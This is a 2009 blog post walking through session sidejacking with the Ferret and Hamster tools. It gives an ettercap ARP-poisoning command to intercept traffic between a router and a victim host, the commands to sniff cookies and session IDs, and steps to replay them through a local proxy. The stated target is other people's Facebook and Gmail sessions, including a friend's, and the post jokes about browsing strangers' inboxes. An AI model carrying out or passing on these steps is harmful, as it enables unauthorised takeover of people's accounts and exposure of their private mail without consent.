Tuesday, November 24, 2009

Ferret and Hamster 2.0 (sidejacking)

Ferret and hamster are two useful utilites when being the man in the middle on an ethernet or wireless network. The idea behind the tools is tool is to sniff out cookies and session ids from the packets it sees and then dubplicating such information in its own browser. The end result is that if you have a friend on facebook and you can get his same cookie information and session id's that n you can get into his facebook session without requiring a username or password. Try login into facebook and close the page without logging out. Reopen the webbrowser then go back to facebook.com and you should be logged in without typing in your credentials. This happens because your cookies or being used to identify you to facebook servers. The utilities compliment each other very well in that ferret is the sniffer that sniffs only cookies and session id information and hamster sets up a pretty web interface in which you can select the sessions that were sniffed from ferret and have them duplicated in your browser. Ferret and Hamster was originally a windows based utility but has now been ported to linux since version 2.0

Demo:
Download: http://www.erratasec.com/erratasec.zip

extract the conetents and make/complile the binaries
After everything is complied there are three files that you need: ferret, hamster, hamster.txt (All files should be in the same folder to work)

Execute a man in the middle attack:
ettercap -Tq -M arp:remote -i eth0 /rounter_ip/ /host_ip/
or


run ferret:
./ferret -i eth0

Ferret is gonna start campturing useful information (note, you dont have to capture/sniff just before a user logs into a site. You can capture his cookies while he is already logged in and browsing the website). It dumps some information into hamster.txt about sessions and cookies that the hamster utilitie needs.

run hamster:
./hamster

Hamster then runs a local proxy webserver on port 1234. To connect to it, change your proxy settings in your browser to use 127.0.0.1 and port 1234. Now in the address bar type 'http://hamster'. When you are presented with the page you may have to refresh a couple of times until hamster sees a host/ip address. Click on the host and you would be presented with some information relating to that host and potentially websites they are on currently. Don't hesitate to click on tha www.facebook.com or www.mail.google.com. Dont be suprised if it you click on it and it takes you into someones else inbox filled with emails for subscriptions to penis enlargement products and animal porn. Don't say i didnt warn you.

Here is a quick demo of such an attack that i made.

sidejacking gmail and facebook accounts from aerokid240 on Vimeo.

No comments:

Post a Comment